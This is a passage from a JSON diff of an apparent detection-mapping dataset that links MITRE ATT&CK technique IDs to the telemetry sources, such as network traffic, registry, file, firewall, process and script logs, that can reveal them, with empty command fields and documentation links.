netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1564.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + null + ] + }, + { + "technique_id": "T1562.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall disable", + "description": "A firewall system was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "firewall" + } + ], + "external_reference": [ + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ] + ] + }, + { + "technique_id": "T1480.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1059.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1578.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + 